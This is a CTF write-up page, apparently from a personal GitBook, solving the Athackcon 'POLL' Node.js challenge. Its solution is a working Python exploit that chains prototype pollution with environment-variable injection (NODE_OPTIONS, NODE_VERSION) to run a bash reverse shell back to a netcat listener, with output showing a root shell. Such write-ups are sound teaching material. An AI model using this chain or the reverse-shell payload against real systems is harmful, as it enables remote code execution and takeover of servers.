Diefunction
  • About
  • Vulnerabilities
    • GHSL-2021-023 / CVE-2021-32819
  • BlachatMEA Finals 2024
  • CTF
    • Technology Control Company
      • Athackcon CTF 2021
        • Trust
        • Config
        • Extend
        • Poison
      • Blackhat MEA 2022
        • CTF Setup on Kali linux
        • Careers
        • SOC Complaints
    • Athackcon
      • POLL
    • Cyber Night 3
      • Client Hell
    • BlackHatMEA Quals 2022
      • Spatify
      • PeehPee
      • Meme generator
      • Black notes
      • Jimmy's blog
    • BlackHatMEA Quals 2023
      • Web - Hardy
      • Web - Authy
      • Reverse engineering - light up the server
    • BlackhatMEA Finals 2024
      • PWN
    • BITSCTF - Reverse Mishap
    • Cybernights 2025
      • REVERSE
      • PWN
    • BYUCTF 2025
      • PWN
Powered by GitBook
On this page
  • Project
  • Solution

Was this helpful?

  1. CTF
  2. Athackcon

POLL

PreviousAthackconNextCyber Night 3

Last updated 3 years ago

Was this helpful?

Structure

poll/
├── docker
│   └── node
│       └── Dockerfile
├── docker-compose.yml
└── src
    ├── app.js
    ├── config.js
    ├── flag.txt
    ├── package.json
    ├── package-lock.json
    ├── static
    │   ├── bootstrap
    │   │   └── css
    │   │       └── bootstrap.min.css
    │   ├── css
    │   │   └── Lightbox-Gallery.css
    │   ├── img
    │   │   ├── about-bg.jpg
    │   │   ├── admin-bg.jpg
    │   │   ├── contact-bg.jpg
    │   │   ├── Fword-CTF-bakground.png
    │   │   ├── home-bg.jpg
    │   │   ├── index-bg.jpg
    │   │   ├── login-bg.png
    │   │   ├── naruto.png
    │   │   ├── register-bg.jpg
    │   │   ├── Wallpaper Subaru Natsuki, Zero, 4K, 5K, Art 6507310401.jpg
    │   │   ├── wp2349778-kuroko-tetsuya-wallpapers.jpg
    │   │   └── wp3754599-hinata-shy-wallpapers.jpg
    │   └── js
    │       └── clean-blog.js
    └── views
        ├── admin.ejs
        ├── animes.ejs
        ├── home.ejs
        ├── index.ejs
        ├── login.ejs
        ├── register.ejs
        └── update.ejs

Solution

Install pip

sudo apt install python3-pip

Install requests

python3 -m pip install requests

Start Netcat listener

nc -lnvp 8443

Exploit

from requests import Session

host = '127.0.0.1'
port = '1234'

session = Session()
session.proxies = {'http': '127.0.0.1:8080'}

payload = {
    'username':'diefunction',
    'password': 'diefunction',
    'anime': 'Bleach'
}
session.post(f'http://{host}:{port}/register', json = payload)

payload = {
    'username':'diefunction',
    'password': 'diefunction'
}
session.post(f'http://{host}:{port}/login', json = payload)

payload = {
    'constructor[name][constructor][lucky]': '1',
    'luck': '1'
}
session.get(f'http://{host}:{port}/update', params = payload)

payload = {
    'envname': 'NODE_OPTIONS',
    'env': '--require /proc/self/environ',
    'path': '/data/config.js'
}
session.post(f'http://{host}:{port}/admin', json = payload)

code = "'';require('child_process').execSync('/bin/bash -c \\\'/bin/bash -i >& /dev/tcp/172.17.0.1/8443 0>&1\\\'');//"
payload = {
    'envname': 'NODE_VERSION',
    'env': f'{code}',
    'path': '/data/package.json'
}
session.post(f'http://{host}:{port}/admin', json = payload)

Run the script

python3 exploit.py

Output

writeup@ubuntu:~/Desktop/athack-ctf/poll$ nc -lnvp 8443
Listening on 0.0.0.0 8443
Connection received on 172.18.0.3 46818
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@c56a8d29b3fb:/data# cat /flag.txt
cat /flag.txt
AtHackCTF{Dummy_Flag}
root@c56a8d29b3fb:/data# 
Project